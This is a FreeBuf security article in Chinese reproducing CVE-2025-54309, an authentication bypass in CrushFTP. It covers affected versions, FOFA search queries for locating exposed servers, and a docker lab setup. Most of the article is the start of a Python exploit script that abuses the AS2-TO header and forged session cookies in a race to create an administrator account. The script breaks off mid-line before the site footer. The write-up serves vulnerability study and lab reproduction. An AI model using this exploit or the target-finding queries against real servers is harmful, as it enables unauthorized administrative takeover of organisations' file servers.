官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
CrushFTP介绍:
CrushFTP是一款功能强大的跨平台FTP服务器软件,它不仅支持FTP、FTPS、SFTP等传统协议,还兼容HTTP、HTTPS、WebDAV及WebDAV SSL等多种现代传输方式。
漏洞概述:
当未使用 DMZ 代理功能时,10.8.5 之前的 CrushFTP 10 和 11.3.4_23 之前的 11 会错误处理 AS2 验证,从而允许远程攻击者通过 HTTPS 获得管理员访问权限,就像 2025 年 7 月在野外利用的那样。
漏洞版本:
CrushFTP 10 < 10.8.5 CrushFTP 10 < 11.3.4_23
FOFA:
fofa:
- icon_hash="-1022206565"
- title="CrushFTP WebInterface"
- body="crushftp"环境搭建:
复现使用docker 容器进行搭建,执行如下命令开启CrushFTP 10
# mkdir /ftproot # docker run -p 21:21 -p 443:443 -p 20000-20100:20000-20100 -p 2222:2222 -p 8080:8080 -p 9090:9090 -v $PWD/crushftp:/var/opt/crushftp -v /ftproot:/ftproot netlah/crushftp:latest
执行完成如下:
此时请求8080端口,以及443端口都是正常的。
漏洞复现:
执行如下脚本绕过认证,创建一个管理员账户
#!/usr/bin/env python3
"""
CrushFTP CVE-2025-54309 Authentication Bypass Exploit - User Creation
Based on working Watchtowr POC pattern
FOR AUTHORIZED PENETRATION TESTING ONLY - HTB Labs Use
"""
import requests
import threading
import time
import random
import string
import sys
import argparse
banner = """
╔═══════════════════════════════════════════════════════════╗
║ CrushFTP CVE-2025-54309 Exploit ║
║ Race Condition Authentication Bypass ║
║ User Creation Version ║
║ ║
║ FOR AUTHORIZED TESTING ONLY ║
║ HTB Labs & Pentesting Use ║
╚═══════════════════════════════════════════════════════════╝
"""
class CrushFTPUserCreator:
def __init__(self, target_url, username, password):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.c2f_value = None
self.crush_auth_cookie = None
self.success = False
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
def generate_random_c2f(self):
"""Generate random 4-character c2f value like the working POC"""
return ''.join(random.choices(string.ascii_letters + string.digits, k=4))
def update_c2f_and_cookies(self):
"""Generate new c2f value and update cookies - exactly like working POC"""
self.c2f_value = self.generate_random_c2f()
# Use the same cookie format as working POC
timestamp = int(time.time() * 1000)
random_suffix = ''.join(random.choices(string.ascii_letters + string.digits, k=24))
self.crush_auth_cookie = f"CrushAuth={timestamp}_{random_suffix}{self.c2f_value}; currentAuth={self.c2f_value}"
print(f"[*] Generated new c2f value: {self.c2f_value}")
def make_request_with_as2(self):
"""Make request with AS2-TO header - following working POC pattern"""
url = f"{self.target_url}/WebInterface/function/"
headers = {
"Host": self.target_url.replace("http://", "").replace("https://", ""),
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"AS2-TO": "\\crushadmin", # Exactly like working POC
"Content-Type": "disposition-notification",
"X-Requested-With": "XMLHttpRequest",
"Cookie": self.crush_auth_cookie
}
# XML payload for creating admin user
user_xml = f'''<?xml version="1.0" encoding="UTF-8"?><user type="properties">
<max_logins_ip>8</max_logins_ip>
<real_path_to_user>./users/MainUsers/crushadmin/</real_path_to_user>
<root_dir>/</root_dir>
<user_name>{sel
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)